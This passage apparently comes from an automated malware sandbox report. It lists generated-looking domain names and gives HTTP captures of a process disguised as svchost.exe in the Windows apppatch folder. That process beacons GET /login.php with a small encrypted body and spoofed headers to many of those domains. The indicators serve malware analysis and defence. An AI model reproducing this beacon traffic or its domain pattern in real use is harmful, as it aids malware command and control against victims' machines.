
gadyniw.com

ww1.lysyfyj.com

gatyfus.com

pupydeq.com

pupycag.com

lyrysor.com

106.15.137.66:8001

galynuh.com

gadyciz.com

lyxynyx.com

qexyhuv.com

qegyval.com

vofycot.com

ww25.lyxynyx.com

ww16.vofycot.com

qetyhyg.com

gatyhub.com

lygyvuj.com

gahyhiz.com

ww6.galyqaz.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	188.114.96.3	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.040391922 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.792238951 CEST	791	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:42:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdjCG3R05d2hj8jTy%2FLhnXPi7DVqKjKWH%2FYm1nrOLQ75biJODf587jhMB%2B5Jt0JTDMd9XjO8nG86PYmoZagG3JueAUMjAY5AXX4cIiSKSwbSVLXOBbUyhi6NhWR6aw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8df3db9918ae-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:42:13.793088913 CEST	791	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:42:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdjCG3R05d2hj8jTy%2FLhnXPi7DVqKjKWH%2FYm1nrOLQ75biJODf587jhMB%2B5Jt0JTDMd9XjO8nG86PYmoZagG3JueAUMjAY5AXX4cIiSKSwbSVLXOBbUyhi6NhWR6aw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8df3db9918ae-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:42:16.168451071 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:16.708097935 CEST	805	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:42:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8OwEht%2FCdq3%2BSFKQ9%2FElIOg7oprS%2F%2BOm6pWv5nHbA14NR6I9sJfU7G%2Fm8sDrwkuBM8LGQ4LtUJt%2BY3JssfalLB5WiBdv%2B9xC%2B%2BKFLS653HJslDI6sMriNeTcBDZ5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8e0b5ee518ae-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	162.255.119.102	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.058268070 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.784838915 CEST	303	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	3.64.163.50	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.185635090 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.841449976 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:42:12.844866991 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.036350965 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	44.221.84.105	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.370343924 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.851449966 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49711	44.221.84.105	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.460902929 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.931709051 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49712	3.94.10.34	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.479856014 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.965327978 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49713	18.208.156.248	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.498455048 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:12.969409943 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49714	199.191.50.83	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.531565905 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:14.001249075 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 23 Aug 2024 16:42:12 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=918vr471976932991951418; expires=Wed, 22-Aug-2029 16:42:12 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 39 61 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 Data Ascii: 19a50<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scr
Aug 23, 2024 18:42:14.001260042 CEST	1236	IN	Data Raw: 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c Data Ascii: ipt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="2
Aug 23, 2024 18:42:14.001277924 CEST	1236	IN	Data Raw: 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 21 3d 3d 22 22 Data Ascii: n"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.la
Aug 23, 2024 18:42:14.001281977 CEST	1236	IN	Data Raw: 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 6f 2e 74 6f Data Ascii: .cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9
Aug 23, 2024 18:42:14.001287937 CEST	896	IN	Data Raw: 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 6a 2e 74 79 70 Data Ascii: ength>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChi
Aug 23, 2024 18:42:14.001629114 CEST	1236	IN	Data Raw: 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e 62 6f 64 79 29 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69 66 28 Data Ascii: ment.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appe
Aug 23, 2024 18:42:14.001638889 CEST	1236	IN	Data Raw: 28 61 5b 30 5d 3d 3d 3d 22 70 69 6e 67 22 29 7b 69 66 28 61 5b 31 5d 3d 3d 3d 32 29 7b 61 5b 32 5d 28 7b 67 64 70 72 41 70 70 6c 69 65 73 3a 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 2c 63 6d 70 4c 6f 61 64 65 64 3a 66 61 6c 73 65 Data Ascii: (a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cm
Aug 23, 2024 18:42:14.001650095 CEST	1236	IN	Data Raw: 3b 64 2b 2b 29 7b 69 66 28 5f 5f 67 70 70 2e 65 5b 64 5d 2e 69 64 3d 3d 65 29 7b 5f 5f 67 70 70 2e 65 5b 64 5d 2e 73 70 6c 69 63 65 28 64 2c 31 29 3b 68 3d 74 72 75 65 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 Data Ascii: ;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:
Aug 23, 2024 18:42:14.001688004 CEST	1236	IN	Data Raw: 3a 65 2c 22 2a 22 29 7d 2c 62 2e 70 61 72 61 6d 65 74 65 72 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 67 70 70 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 Data Ascii: :e,"")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"")},"p
Aug 23, 2024 18:42:14.001699924 CEST	896	IN	Data Raw: 7d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 63 6d 70 22 29 3b 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 Data Ascii: }window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)\|\|!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)\|\|!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)\|\|!w
Aug 23, 2024 18:42:14.006149054 CEST	1236	IN	Data Raw: 58 45 31 57 55 51 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 Data Ascii: XE1WUQ=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='29591' b='33549' c='galyqaz.com' d='entity_mapped'" /><title

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49715	208.100.26.245	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
